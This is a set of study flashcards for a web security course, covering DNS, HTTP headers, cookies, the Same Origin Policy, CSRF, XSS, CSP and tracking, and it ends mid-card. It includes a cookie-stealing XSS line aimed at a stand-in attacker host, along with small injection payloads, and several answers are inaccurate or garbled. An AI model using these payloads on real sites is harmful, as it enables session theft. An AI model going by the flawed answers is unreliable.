CS 253 Web Security Youtube Pt1 Flashcards
What is the difference between a vulnerability and an exploit?
A vulnerability is a part of the site that makes it behave unexpectedly but does not allow one to insert malicious code, unlike an exploit
What reasons are there to attack a computer system?
Spam - To trick people into clicking things
Denial of service - To attack competitors or seek ransom
Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients
Data theft - credentials, credit card numbers, intellectual property
Mine cryptocurrency
Ransomware
Political motivations
What does web security involves?
Browser security, server app security, client app security
It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)
Why is web security hard?
- The web wants to provide the ability to run anyone’s code on your computer securely. Run untrusted code securely.
- Different sites may interact with each other
- Websites have a lot of low-level features (hardware access)
- There is a desire for high performance
- APIs for web browsers were not design from first principles. They have evolved
- Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.
What can websites do that constitute very high security risks?
- Download content from anywhere
- Spawn worker processes
- Open sockets to a server, or even to another user’s browser
- Display media in a huge number of formats
- Run custom code on the GPU
- Save/read data from the filesystem
What does DNS stands for?
Domain Name System
What is the Domain Name System?
A system that translates user friendly domain names into IP addresses
How does DNS querying works?
The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.
How does the DNS server works when performing a DNS query?
The client machine sends the domain name to the DNS server.
The DNS server uses the DNS Recursive Resolver to look up the answer for the domain name. It will continually perform queries to different servers asking if they have information on the domain name, until it gets a positive response.
The queried servers are called nameservers and there are multiple because one of them cannot allocate all of the existing domain names.
What is a good example of a DNS querying process?
Let’s say we try to access the url: https://www.standford.edu
The client sends the domain name (standford.edu) to the DNS Server.
The DNS Server using the DNS Recursive Resolver queries the Root Nameserver. The Root Nameserver does not have the IP Address, so it responds with the instruction to query the “.edu” Nameserver.
The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “standford.edu” Nameserver
The DNS Recursive Resolver queries the “standford.edu” Nameserver. The “standford.edu” Nameserver does have the IP address, so it returns it.
The DNS Recursive Resolver return the received IP address to the Client.
What is a TLD Nameserver?
Its the nameserver that holds all instructions or addresses for a top-level domain.
Example:
.com
.org
.edu
What does the TLD in a TLD Nameserver stands for?
Top-Level Domain Nameserver
What is a top-level domain?
It is the part of the domain name after the dot that is used to indicate the type or category of a website.
Examples:
.com
.org
.edu
What does SLD stands for, regarding domain names?
Second-Level Domain
What is a second-level domain?
It is the part of the domain name before the dot that indicates the name of the website
Examples:
wikipedia.com = wikipedia
brainscape..com =- brainscape
What is a Domain Nameserver?
The Nameserver that holds the information regarding a particular domain name
What is DNS hijacking?
The attacker changes DNS records of target to point to own IP address. After this all site visitors will be directed to the web server of the attacker.
What are the vectors (places) where you DNS hijacking can occur?
- Malware changes user’s local DNS settings
- Hacked recursive DNS resolver
- Hacked router
- Hacked DNS nameserver
- Compromised user account at DNS provider
What does ISP stands for?
Internet Service Provider
Why is it easy for ISPs to sell the lists of the DNS you have queried?
Because the queries are in plaintext .
What can you do to try and avoid ISPs selling your DNS queries lists?
You can consider switching your DNS setting to use the Cloudflare server or any other provider that at least has a good privacy policy.
What do HTTP Status Codes mean in general?
1xx - Informational, you need to hold on some time
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error
What are some well-known HTTP Success status codes?
200 - Ok - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded
What are some well-known HTTP Redirection status codes?
301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached
What are some well-known HTTP Client error codes?
400 - Bad Request - The request was malformed
401 - Unauthorized - Resource is protected, need to authorize
403 - Forbidden - Resource is protected, denying access
404 - Not Found - Resource was not found
What are some well-known HTTP Server error codes?
500 - Internal Server Error - Generic Server Error
502 - Bad Gateway - Server is a proxy; backend server is unreachable
503 - Service Unavailable - Server is overloaded or down for maintenance
504 - Gateway Timeout - Server is a proxy, backend server responded too slowly
What can an HTTP Proxy server do or be useful for?
It can:
- Cache content
- Block content (malware, adult content, etc)
- Modify content
- Sit in front of many servers (reverse proxy)
What is a client-side proxy?
Its a proxy that sits between the client and the web retrieving resources from the internet.
It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.
What is another name for a client-side proxy?
Forward proxy
What is another name for a forward proxy?
A client-side proxy
What are the HTTP headers and what are they good for?
They are essentially a amp of key-value pairs.
They let the client and the server pass additional information with an HTTP request or response.
and therefore it allows experimental extensions to be added to HTTP without requiring protocol changes.
What are 11 of the most useful HTTP request headers?
Host
User-Agent
Referer
Cookie
Range
Cache-Control
If-Modified-Since
Connection
Accept
Accept-Encoding
Accept-Language
What is the Host, HTTP request header used for?
It is meant to contain the domain name of the server
What is the User Agent, HTTP request header used for?
It is meant to contain the name of the browser and operating system.
Technically it contains not the name of the browser, but the name of the User Agent. Which is normally the browser.
What is the Referer, HTTP request header used for?
It is meant to contain the webpage which led you to this page (The word Referer is misspelled, but that’s how it is written in HTTP)
What is the Cookie, HTTP request header used for?
It is meant to keep the cookie the server gave you earlier. This helps you to keep you logged in
What is the Range, HTTP request header used for?
Specifies a subset of bytes to fetch. This is the same Range concept that is used for HTTP 206 response status code.
What is the Cache-Control, HTTP request header used for?
Helps to specify if you want a cached response or not.
What is the If-Modified-Since, HTTP request header used for?
Allows to specify a date time so that the response will only be updated if the resource has been modified since that datetime.
What is the Connection, HTTP request header used for?
Sends instructions to control the TCP socket used for the request, either to maintain it opened or to close it. (keep-alive, close)
What is the Accept, HTTP request header used for?
You can specify which type of response you will accept
Example: text/html
What is the Accept-Encoding, HTTP request header used for?
You can specify which encoding algorithms you understand.
Example: gzip
What is the Accept-Language, HTTP request header used for?
You can specify which language you expect.
Example: es, en
What are 12 of the most useful HTTP response headers?
Date
Last-Modified
Cache-Control
Expires
Vary
Set-Cookie
Location
Connection
Content-Type
Content-Encoding
Content-Language
Content-Length
What is the Date, HTTP response header used for?
It contains when the response was sent.
What is the Last-Modified, HTTP response header used for?
It contains when the content was last modified.
What is the Cache-Control, HTTP response header used for?
It specifies whether you want the client to cache the response or not
What is the Expires, HTTP response header used for?
Contains a date to point out when the browser should discard the response from cache.
What is the Vary, HTTP response header used for?
Contains a list of request headers which affect the response. So the browser will save and check the list of headers in new requests and if they are different it will not use the cache version. Otherwise it will use it.
What is the Set-Cookie, HTTP response header used for?
Sets a cookie value on the client
What is the Location, HTTP response header used for?
Used to redirec the client to another url. This has to be used alongside 3xx response.
What is the Connection, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Type, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Encoding, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Language, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Length, HTTP response header used for?
Confirms the HTTP request header counterpart
What does HTTP stands for?
Hypertext Transfer Protocol
What does TLS stands for?
Transport Layer Security
What does TCP stands for_
Transmission Control Protocol
What does IP stands for
Internet Protocol
What does the client need to do in order to find the IP of the site it wants to connect to?
It needs to request it through the DNS Server using the domain name
What does the client do after getting the IP address>
It opens a connection using TCP
What does the client does after openning the TCP connection?
It applies TLS encryption, although it is optional
What does the client does after opening the TCP connection and applying (or not) the TLS encryption?
It makes the HTTP request by using the socket opened by TCP.
What happens when you type a URL and press enter?
- Performs a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4)
- Opens a TCP socket to 1.2.3.4 on port 80 (The HTTP port)
- Send an HTTP request that includes the desired path
- Read the HTTP response from the socket
- Parse the HTML into the DOM
- Render the page based on the DOM
- Repeat until all external resources are loaded:
- If there are pending external resources, makes HTTP requests for these (runs steps 1 -4)
- Renders the resources into the page.
What is the syntax for a server to set a cookie on a client?
Set-Cookie: theme=dark;
What is the syntax for a client to send a cookie to the server?
Cookie: theme=dark;
What is a session?
The method in which a server keeps a set of data related to a user’s current “browsing session”
What are some examples in which sessions are commonly implemented?
Logins
Shopping carts
User tracking
What does the term “Access Control” refers to?
To the act of regulating who can view resources in a web site or take actions.
What does the term “Ambient Authority” refers to?
To implementing Access Control, based on a global and persistent property of the requester.
Which types of Ambient Authority exist on the web?
4 in total:
Cookies - the most common and most versatile method
IP checking - used at Stanford for library resources.
Built-in HTTP Authentication - rarely used
Client Certificates - rarely used
What are the signature schemes used normally for implementing Ambien Authority with Cookies?
The triple of algorithms
- Generator
- Signer
- Verifier
What does the generator function does?
It does not receive any input and returns a primary key and a secret key
What does the Signer function does?
Receives the secret key and a value.
It uses the secret key to perform a series of operations on the value and returns a value called tag. (Which is the signed value)
What does the Verifier function does?
It receives the primary key, the original value and the signed value.
Internally it performs a series of operations in order to check the validity of the tag generated from the original value.
How does the process of requests work using the Ambient Authority with Cookies?
- The server generates the pk and sk
- The browser sends a POST login request
- The server validates the user and password
- The server signs the username value and generates a tag
- Server sends back the tag and the username as cookies with the Set-Cookie header
- The Browser sets both cookies as instructed by the server
- The Browser sends future requests with both username and tag in the Cookie header
- The server validates if the tag and username are valid for one another
What are some cookie attributes you can specify?
Expires - Specifies expiration date. If no date, then lasts for a session
Path - Scope the “Cookie” header to a particular request path prefix
Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header
What is the format for the Set-Cookie header sent by the server?
Example:
Set-Cookie: theme=dark;Expires=<date>;</date>
How does Session hijacking works?
When sending cookies over unencrypted HTTP anyone can intercept the cookies and use them to hijack the user’s session.
Once the attacker has the cookie, he can send the victim’s cookie as if it were his own and the server will be fooled into thinking he is the owner of the session.
How can you mitigate a Session hijacking attack?
- You can add the Secure cookie attribute to prevent cookie from bein sent over unencrypted HTTP connections.
Set-Cookie: key=value; Secure
- You use HTTPS over the entire website
Why does using HTTPS mitigates a Session hijacking attack?
Because the data transferred during HTTPS communication is encrypted.
What is a very common form of JS code used in Session hijacking via Cross Site Scripting?
new Image().src = ‘https://attacker.com/steal?cookie=’ + document.cookie
What does XSS stands for?
Cross Site Scripting
What can you do to protect your cookies from XSS?
You can add the attribute HttpOnly to your Set-Cookie header.
This way the cookies will not be accesible through Javascript. Only through HTTP.
Set-Cokkie: key=value; Secure; HttpOnly
Why would one attempt to use the Path attribute for security?
Because the Path attribute allows you to limit the sharing of a cookie to only a specific url path and therefore on paper it wouldn’t allow other unwanted paths to access the cookie.
Why is it not recommended to use the Path attribute for security?
Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin.
It can be bypassed using an <iframe> tag
What are the steps needed to bypass the Path attribute?
- Go to another page and create an iframe element on javascript:
const iframe = document.createElement(‘iframe’)
- Assignt the url from which you want the cookies to the iframe src
iframe.src = ‘https://web.stamdord.edu/class/cd106a’
- Access the document object from the page loaded by the iframe
iframe.contentDocument.cookie
With this you already have unauthourized access to said cookie
What is the best-practice recommendation when using the Path cookie attribute?
To don’t ever use it.
Instead you should set an invalid value for it: Path=/
Example:
Set-Cookie: key=value; Secure; HttpOnly; Path=/
What is the problem with ambient authority with cookies?
That the website does not check from the origin of the request, it only checks for the cookies to be present.
This means that you can embed a request with the cookies to be made from the cmd or another site to make the request to the actual web page.
If the attacker can embed a code on the authorized user’s page, then it can make the correct request with the correct cookies.
Example:
secretRequestString = ‘https://bank.example.com/withdra?from=originAccountEncrypted&to=destinationAccountEncrypted&amount=encryptedAmount
<img></img>
What does CSRF stands for?
Cross-Site Request Forgery
What does Cross-Site Request Forgery consists on?
It is an attack which forces an end user to execute unwanted actions on a web app in which they’re currently authenticated
What are some use cases for a Cross-Site Request Forgery attack?
To make a normal user change passwords to one the attacker knows, or to transfer funds.
To make an admin user add a new user (normally the attacker) and give him privileges to access other areas.
What is a SameSite Cookie?
It is a cookie attribute that prevents cookies from being sent with requests initiated by another sites.
What are the 3 possible values of the SameSite cookie attribute?
None, Lax and Strict
What does the cookie attribute
SameSite=None
does?
It acts as default. Always sends cookies, regardless of the origin.
What does the cookie attribute
SameSite=Lax
does?
It withholds cookies on subresource requests originating from other sites, allows them on top-level requests
What does the cookie attribute
SameSite=Strict
does?
Only sends cookies if the request originates from the same site that set the cookie
How do you apply the SameSite cookie attribute in an example?
Set-Cookie: key=value; Secure; HttpOnly; Path=/; SameSite=Strict
How long should cookies last as a best practice?
30 days ideally max 90 days
How do you set the cookie attribute that points the time a cookie should last?
With the Expires attribute cookie
What is the Same Origin Policy?
Its the policy that says:
Two pages from different sources should not be allowed to interfere with each other.
What is an origin (in the context of a web browser) analogous to in an operating system?
To an OS process
Each process in an OS is separated from one another so they don’t interfere with each other.
What is a web browser analogous to in an operating system?
To an OS kernel
This is the component in charge of processes management.
What is an OS Kernel?
It is the core component of an Operating System that manages the system’s resources and facilitates communication between hardware and software, acting like a bridge between them.
It provides essential services, like memory management, process management and device management. This enables applications to run and interact with the hardware effectively.
What is an origin, in the context og a web browser, composed of?
It is made up the protocol, the host and the port.
How would an example of a url with all of its possible parts look and what would each part be?
https://example.com:4000/a/b.html?user=Alice&year=2029#p2
Protocol = https:
Hostname = example.com
Port = 4000
Path = /a/b.html
Query = user=Alice&year=2019
Fragment = p2
What would the function for the same origin policy look like?
function isSameOrigin(url1, url2) {
return url1.protocol === url2.protocol &&
url1.hostname === url2.hostname &&
url1.port === url2.port
}
What happens when you try to fetch another site, like gmail, from a different site, like localhost, steam, microsoft, etc?
The browser will return a CORS error. Precisely because of the Same Origin Policy.
How is it that the Same Origin Policy works when making a request from site to site? Do you implement it on your website?
No. The Same Origin Policy is implemented at the browser level. Since it a basic security policy all browsers have it by default.
This is why sometimes you don’t get that error when using other mediums to make requests, like Postman or cURL.
What does CORS stands for?
Cross Origin Resource Sharing
What exactly is a CORS error?
It is an error that pops up when a request is made to a url that is not allowing the source urls on its configuration.
By default the allowed urls are only the ones that follow the Same Origin Policy.
How is the Fragment section of a Url indicated?
With the # symbol
Example:
https://example.com:4000/a/b.html?user=Alice&year=2029#p2
Fragment = p2
What does a url with a fragment does?
It does not reload the page, it jumps the page to a section of it without reloading.
What is the postMessage API?
It is an API that allows secure cross-origin communications between cooperating origins, permitting to send strings and arbitrarily complicated data.
What is a best practice (that is actually must use practice) of the postMessage API and why?
When using the postMessage API you should specify the origin your data is destined to while calling the postMessage function, like this:
window.postMessage(data, ‘https://yourtargetsite.com’)
This is because when the browser sees this it will make sure that no site will even catch the postMessage unless it is the origin specified.
Additionally on the destination site. You should always validate the origin as well.
window.addEventListener(‘message’, event => {
if (event.origin !== ‘http://localhost:4000’) {
return
}
div.textContent = event.data
})
What are the url requests exceptions to the Same Origin Policy?
Any embedded static resources are exceptions and can come from another origin. These include:
- Images
- Scripts (like the ones imported in an HTML, like libraries)
- Styles (like Google Fonts)
What is a possible breach that could occur by taking advantage of the exceptions to the Same Origin Policy? What could be the solution>
You could request an avatar’s image and use it to replicate in a phishing site.
However this could be blocked in 2 ways:
- SameSite Cookies Implementation: and then the cookies would only be saved on the specified URL, therefore making the request without the needed cookie to get the right avatar image.
- Referer Header Validation: Inspect the Referer Header which contains the origin that made the request and of course validate it with a list of accepted origins. Additionally you need to add the header Cache-Control: no-store. This forces the browsers to never store the resource on cache and therefore will always make the request to the url.
If you don’t add the Cache-Control header this opens up the scenario where the attacker’s browser already has the image cached and therefore will not actually complete the request and just use the cached image. Also some sites can opt out of even using the Referer header.
So the SameSite cookies is the way to go.
Do Cookies follow the Same Origin Policy? Why?
No
Because they were created before the Same Origin Policy.
Why is it said that Cookies are both more specific and less specific than the Same Origin Policy?
They are more specific because technically the Path attribute (which limits the path the cookie can be read from) is more specific than an origin. Which only contains protocol, domain name and port.
They are less specific because they allow different origins to set cookies for each other. Example: attacker.standfor.edu could set cookies for stanford.edu
What does the Same Origin Policy allow from site to site provided they have the same origin?
It allows site A to link to site B. You can try to prevent it but it can be circumvented.
It allows site A to embed site B. This can be configured to be prevented.
It allows site A to submit a form to site B. Although it allows a middle-ground by configuring only the same origin to be allowed with SameSite cookie.
It allows site A to embed images from site B. You can try to prevent it but it can be circumvented.
It allows site A to embed scripts from site B. You can try to prevent it but it can be circumvented.
What does the Same Origin Policy does not allow from site to site provided they have the same origin?
It does not allow site A to embed site B and modify its contents.
It does not allow site A to read data from site B
Can we prevent a site from linking to your site?
No this is not possible. The web is made so any site can link to another,
However we can look at the Referer header and reject certain requests. (The Referer header contains information on the origin of the linking)
How can a site control whether it uses the Referer header or not?
By defining its behaviour through the use of another header call Referrer-Policy header
What are the values the Referrer-Policy header can take on and what do each one of them does?
Referrer-Policy: unsafe-url
- Sends the full url
Referrer-Policy: no-referrer
- Nevers sends the Referer header
Referrer-Policy: no-referrer-when-downgrade
- Sends full url. When HTTPS -> HTTP downgrade, then it sends nothing
Referrer-Policy: origin
- Sends origin instead of full url
Referrer-Policy: origin-when-cross-origin
- On same origin, sends full url. On Cross, origin sends origin.
Referrer-Policy: same-origin
- On same origin, sends full url. On Cross origin, sends nothing.
Referrer-Policy: strict-origin
- Sends origin. When HTTPS -> HTTP downgrade, sends nothing.
Referrer-Policy: strict-origin-when-cross-origin
- On same origin, sendsd full URL. On Cross origin, sends origin. Whne HTTPS -> HTTP downgrade, sends nothing.
What is a Cross-origin?
Any protocol, hostname or port combination that is not the origin value.
What is the X-Frame-Options HTTP Header for?
It allows to set the configuration for a page to define if it permits itself to be used on an iframe or not.
What are the values the X-Frame-Options header can take on and what do each one of them does?
X-Frame-Options: (not specified)
Any page can display this page in an iframe. This is the behavior by Default.
X-Frame-Options: deny
Page can not be displayed in an iframe
X-Frame-Options: sameorigin
Page can only be displayed in an iframe on the same origin as the page itself.
Can we prevent a site from submitting a form to our site?
Yes but only partially. We need to implement a couple of things.
- Detect the Origin Header and filter the valid ones through an allowlist.
- Us the SameSite cookies header so cookies are not shared with other urls.
These solutions will not prevent the actual form submission but will evaluate it and discard if it does not meet the needed requirements.
Why would we want to prevent a site from linking to our site? What could benefit us from this?
This could help in theory to take care of SEO (Search Engine Optimization). It is well-known that if some sketchy or bad reputation sites link to your webpage your SEO score will lower, since it could be concluded that your site is related or could have something to do with those other sites.
Why would we want to prevent a site from submitting a form to our site? What could benefit us from this?
This could help us avoid any CSRF (Cross-Site Request Forgery) attacks
Can we prevent a site from embedding our site?
Yes. With the use of the HTTP header: X-Frame-Options
Why would we want to prevent a site from embedding our site? What could benefit us from this?
This could help preventing clickjacking attacks
Can we prevent a site from embedding images from our site?
Yes we have two ways to address this:
For hotlinking: Detect the Referer header and filter the options with an allowlist. (Referer header is not present always)
For avatar images: Use the header SameSite cookies.
Why would we want to prevent a site from embedding images from our site? What could benefit us from this?
We could prevent hotlinking
And also prevent attacks where something like the avatar of a user shows up on other sites.
Why would we want to prevent a site from embedding scripts from our site? What could benefit us from this?
To prevent hotlinking. Although embeddin scripts is a common practice since that is what is done to use libraries like when you use:
<script> This would load the d3 library onto your site </script>
Can we prevent a site from embedding scripts from our site?
Yes. We can use the Referer header and filter the options with an allowlist. (Referer header is not present always)
Are
tags subjected to the Same Origin Policy?
No, they aren’t
What is JSONP?
JSONP stands for JSON with Padding
It is used for making a request to a URL using the
tag instead of the XMLHTTPRequest object (which is the default used for HTTP Requests)
It basically tells the server to wrap the JSON object inside some brackets (). This enables the result to be passed as a parameter to a function call
Why would you want to use JSONP for?
To allow information to be read from site to site.
Or another way of saying it is to support cross-origin requests.
Remember that this is not allowed by the Same Origin Policy so using JSONP method is a way to allow information to be read from another site.
What are the downsides of using JSONP?
The origin site needs to write additional code to support cross-origin requests.
It needs to be careful because not all JSON strings are valid Javascript.
Additionally it needs to sanitize the user-provided callback argument. To prevent an injection attack
The implementing site needs to allow the origin site to run arbitrary Javascript. So in case there is a breach it leaves the implementing site vulnerable.
What is XSS?
XSS stands for Cross Site Scripting
It is a code injection vulnerability, specifiically of Javascript into an HTML document
What is a code injection vulnerability?
It is a vulnerability caused when untrusted user data unexpectedly becomes code.
Any code that combines a command with user data is susceptible to code injection.
An example of code injection is:
- XSS (Cross Site Scripting) - Code injection where the unexpected code is Javascript into an HTML document
- SQL Injection - Code injection where the unexpected code is extra SQL commands included in a SQL query string.
What is an example of XSS in action?
Whenever a request is made to the server. (a GET request) you can insert script strings instead of an actual value for the query parameters. (A Reflected XSS) Example:
http://www.wordpress.com?search=
(function() {console.error('You have been hacked!!!')})();
In this case depending on how the site is made this could be enough for a XSS attack
How can we mitigate XSS attacks?
By making sure we sanitize any string we get from the client.
The rule is never trust the client.
What is Reflected XSS?
Its the XSS where the attacker will place some code in the HTTP itself.
The goal of the attacker for this case will be to find a URL on the site that he can target and that will process the included code.
The limitation is that the attack code must be added to the URL path or query parameters.
What is Stored XSS?
Its the XSS where the attacker places the code and persists it into the database. Once there, the server will include said code in all pages sent to clients.
The goal of the attacker is to get the code into the database by any means necessary.
How does a XSS attack on an image property would work?
If we have a property that depends on certain user input this could happen.
Example:
<img></img>
attacked with this code
ending’ onload=’alert(document.cookie)
will end up looking like this:
<img></img>
What does the string sanitization that protects the codebase from XSS attacks, consists in?
It basically just replaces special characters into string characters:
For example, if someone tries to inject this code into the place of VALUE:
http://www.wordpress.com?search=VALUE
attacked with this code:
alert('Hacked')
or
<img></img>
attacked with this code
ending’ onload=’alert(document.cookie)
The sanitization process will replace the following characters:
“<” with <
“&” with &
“’ ‘ “ with '
“ “ “ with "
< stands for “less than” and its a way to say to the program that the character “less than” should be printed as only a string character.
& stands for “ampersant”
' stands for “single quote”
" stands for “double quote”
Therefore the final strings will be:
<script>alert(‘Hacked’)</script>
<img src=’avatar.png’ alt=’ending' onload='alert(document.cookie)' />
Which is enough to make the code unexecutable.
The sanitization functions can be custom made, but most libraries already have function for such purposes.
What is an HTML style that could not be parse with the sanitization process (escape the string) and therefore is even more vulnerable to XSS attacks?
The HTML attributes without quotes.
In HTML these 3 styles are valid:
Double quotes, single quotes, and no quotes
<img></img>
<img></img>
<img src=avatar.png alt=USER_DATA_HERE/>
The no quotes styling cannot be parsed with the sanitization process and therefore it is highly recommended to avoid using it.
What are some attributes that are not safe even if you escape the attribute value?
src and href
What are data urls?
Urls prefixed with the data: scheme
They are a type of URI used for embedding small documents directly within a web address.
Commonly used to encode small images such as logos and embed them in HTML.
What are the advantages of using data URLs?
The data URLs allow to include the data for resources directly in the HTTP request. Meaning the client does not have to subsequently request the resource/ So it avoids additional overhead for creating new connections.
What are some disadvantages of using data URLs?
It increases the HTML document overall size when requested through HTTP.
Also the data URL is not cacheable as a separate HTTP request, so the content of the data URL may be downloaded repeatedly depending on the Caching parameters of the HTML document it is embedded in.
Additionally content that is provided through a data URL is subject to XSS attacks.
What is an example of a data url?
data:text/html, <h1>A header</h1>
What are javascript urls?
Urls prefixed with the javascript: scheme
They are used as fake navigation targets that execute javascript when the browser attempts to navigate. It the URL evaluates to a string, it is treated as HTML and rendered by the browser.
It lets you run javascript in the context of the page you’re in.
What is an example of a javascript url?
javascript:alert(‘hi’)
What are some actual use cases you can see data and javascript urls being used in?
As a legacy way to ruin javascript in response to a click:
<a>Say Hi</a>
To save an HTTP request in an HTML page:
(This makes sense to make a small image or something be loaded on the first call)
<img></img>
To save an HTTP request in a CSS file:
(This makes sense to make a small image or something be loaded on the first call)
body {
backgrouund-image: url(data:image/png;base64, iVBorw…);
}
What does injecting down mean in a XSS attack?
It means creating a new nested context inside javascript
What does injecting up mean in a XSS attack?
It means ending the current js context to go to a higher context.
What is the goal of the idea of “Defense-in-depth”?
To provide redundancy in case security controls fail, or a vulnerability is exploited.
Meaning we should implement many different layers of defense even if they are redundant and achieve the same goal.
How can you defend the user’s cookies from being read from Javascript in the user’s browser?
With the HttpOnly cookie attribute which is configured from the app’s server.
Set-Cookie: key=value; HttpOnly
What does the CSP stands for?
Content Security Policy
What is the use of a Content Security Policy?
It is the inverse of the Same Origin Policy.
The Content Security Policy prevents our site from making requests to other sites.
How can you implement Content Security Policy on your site?
Add the Content-Security-Policy header to an HTTP response to control the resources the page is allowed to load.
Example:
Content-Security-Policy: default-src ‘self’
What does the simplest Content-Security-Policy header means?
Content-Security-Policy: default-src ‘self’
This means that only the origin page will be allowed by the Content-Security-Policy
Additionally it also prevents any inline code execution.
How does a Content Security Policy header looks like that allows all resources from our own site, including our subdomains, but blocks resources from anywhere else? And also allows images from anywhere?
Content-Security-Policy: deafulr-src ‘self’ *.mailsite.com; img-src *
(This assumes that mailsite.com is a sub-domain)
Is there a way to test Content Security Policy headers before deploying to production in order to test that you are not blocking any needed or important resource your site needs?
Yes, you can use the report-only mode.
Instead of using the Content-Security-Policy header you should use this header:
Content-Security-Policy-Report-Only: policy_rules_here
This will make it so you get a report of all the resources that were blocked and permitted. However the CSP itself will not be enforced. So in practice it will not block anything. This way you can make sure that your CSP will not break your site.
is there a way to enable report for Content-Security-Policy while it is in production blocking unwanted resources?
Yes, you can enable policy violation reports
Content-Security-Policy: default-src ‘self’; report-uri https://example.com/report
What are the most common Content Security Policy fetch directives that inherit from the fetch directive “default-src”?
default-src
connect-src
font-src
frame-src
img-src
manifest-src
media-src
object-src
script-src
style-src
worker-src
What does the Content Security Policy fetch directive: “default-src” does?
Serves as a fallback for other fetch directives.
What does the Content Security Policy fetch directive: “connect-src” does?
Restricts sources from “script interfaces” like: fethc, XHR, WebSocket, EventSource, Navigator.sendBeacon(), <a></a>
What does the Content Security Policy fetch directive: “font-src” does?
Restricts sources for fonts
What does the Content Security Policy fetch directive: “frame-src” does?
Restricts sources for nested browsing contexts like: <frame>, <iframe></frame>
What does the Content Security Policy fetch directive: “img-src” does?
Restricts sources for images, favicions
What does the Content Security Policy fetch directive: “manifest-src” does?
Restricts sources for app manifests files
What does the Content Security Policy fetch directive: “media-src” does?
Restricts sources for media like: <audio>, <video>, <track></track></video></audio>
What does the Content Security Policy fetch directive: “object-src” does?
Restricts legacy plugins: <object>, <embed></embed> and <applet></object>
What does the Content Security Policy fetch directive: “script-src” does?
Restricts sources for
elements
What does the Content Security Policy fetch directive: “style-src” does?
Restricts sources for <style> and <link></link> elements</style>
What does the Content Security Policy fetch directive: “worker-src” does?
Restricts sources for Worker, SharedWorker and ServiceWorker
What are some common Content Security Policy directives that do not inherit the value set in the directive “default-src”?
base-uri
form-action
frame-ancestors
navigate-to
upgrade-insecure-requests
What does the Content Security Policy fetch directive: “base-uri” does?
It restricts the URLs that can be used on the <base></base> element
What does the Content Security Policy fetch directive: “form-action” does?
It restricts the URLs that can be used as target of form submission
What does the Content Security Policy fetch directive: “frame-ancestors” does?
It restricts parents which may embed this page using <frame> or <iframe></frame>
What does the Content Security Policy fetch directive: “navigate-to” does?
It restricts the URLs to which a document can initiate navigation by any means
What does the Content Security Policy fetch directive: “upgrade-insecure-requests” does?
It instructs the browser to treat all HTTP URLs as the HTTPS equivalent transparently
What is the HTML tag <base></base> used for?
Its usage is like the <a> tag. It specifies a URL. But the URL specified in <base></base> will be used as a prefix for all relative URLs in a document.</a>
Example:
<!DOCTYPE html>
<html>
<head>
<base></base>
</head>
<body>
<img></img>
</body>
</html>
What is the most common problem with Content Security Policy in real world scenarios?
On web development there are many times where websites use code from other sources (3rd party libraries).
What happens very often is that these 3rd party libraries many times also use other 3rd party libraries as well.
This makes you run into the issue that if you try to apply whitelists of allowed URLs you will also have to include your dependencies and the dependencies of your dependencies…and so on.
Depending on the size of your site this makes it extremely fragile. It will only take for one of the scripts on your dependency tree to upgrade to use another library to break your site and require a new CSP update.
What is the solution to the CSP problem where if you try to whitelist all dependencies you will eventually end up blocking some needed ones or trusting some dangerous ones?
You can use the “strict-dynamic” directive
What does the CSP directive “strict-dynamic” does?
It scans all the scripts present in the markup and accompanies them with a nonce attribute. Said attribute will have a randomly generated value by the server.
This will give automatic trust of execution to every script that is marked with this nonce. Otherwise it will block them.
What are the Feature-Policy HTTP headers?
Policies that allow you to selectively disable browser features. Somme of them include:
gelocation
autoplay
vertical-scroll
What is DOM-based XSS?
Its the attack that via a script, tricks the DOM into adding attacker nodes into the page.
Unlike reflected or stored XSS, the attacker doesn’t change the HTML rendered by the server. Instead the page is attacked at “runtime”.
How can one guard against DOM-based XSS?
Just make sure to never set html via the innerHTML property.
Use textContent property instead.
Another solution is to use the “trusted-types” CSP fetch direcive.
What does the CSP fetch directive “trusted-types” does?
It allows to create a validator function that will validate each fetch request made and will block any that does not pass the validation
Why does tracking surges as a concern in the web?
It all started because of marketers. Even in the era before internet, companies were trying to track the people in order to match their sale efforts with the potential customers.
When internet starts to become adapating the websites via iframes starts sharing the available data of the user and the marketing servers would then opt for the best possible ad match to return to the iframe.
What is the technology that allows people to track others across websites?
Cookies + 3party Resources
Why were the cookies set up as a way to enable 3rd parties to track users?
They weren’t. That was not the purpose.
This is a consequence of a couple of decisions made beforehand.
Web0.0 needed a way to login and authenticate users to a website securely. Thus the idea of tokens came up and cookies were born.
On the other hand on the 90s hosting was extremely expensive, so if websites ended up hosting the same image, that ended up costing not a trivial amount of money. So the idea came up to share pictures across domains, which involved making a request to get said images. As a rushed decision it was set to include the cookies in that request.
The creation of the cookies and the behavior of including them in the requests came with the consequence of enabling tracking.
Why were cookies created?
Web 0.0 needed a way to login and authenticate users to a website securely. Thus the idea of tokens came up and cookies were born.
What happened after the tracking behavior was noticed by the tech community?
Some browsers started fighting back by blocking 3rd party cookies
like: Safari, Firefox, Brave
As a response the tracker sites started moving the information they had in cookies to other parts: the query params, the local storage, etc.
What is the difference between classic tracking and fingerprinting (passve tracking)?
With classic tracking:
- Website stores an id on the client.
- The client return the id to the server (either via cookies or via JS)
- The id is what allows re-identification
With fingerprinting/passive tracking:
- Website fins things different about each visitor.
- The differences are what allows for re-identification.
What are some ways that fingerprinting is done?
By taking notice of several semi-identifiers, such as:
- Browser size
- Extra fonts
- Audio hardware
- Video hardware
- Installed plugins
- Color Depth
- User Agent String (Header)
- Canvas / WebGL
- Window height and width
Amongst others
What are the 2 things that determine the success rate of fingerprinting?
- The breath of fingerprints.
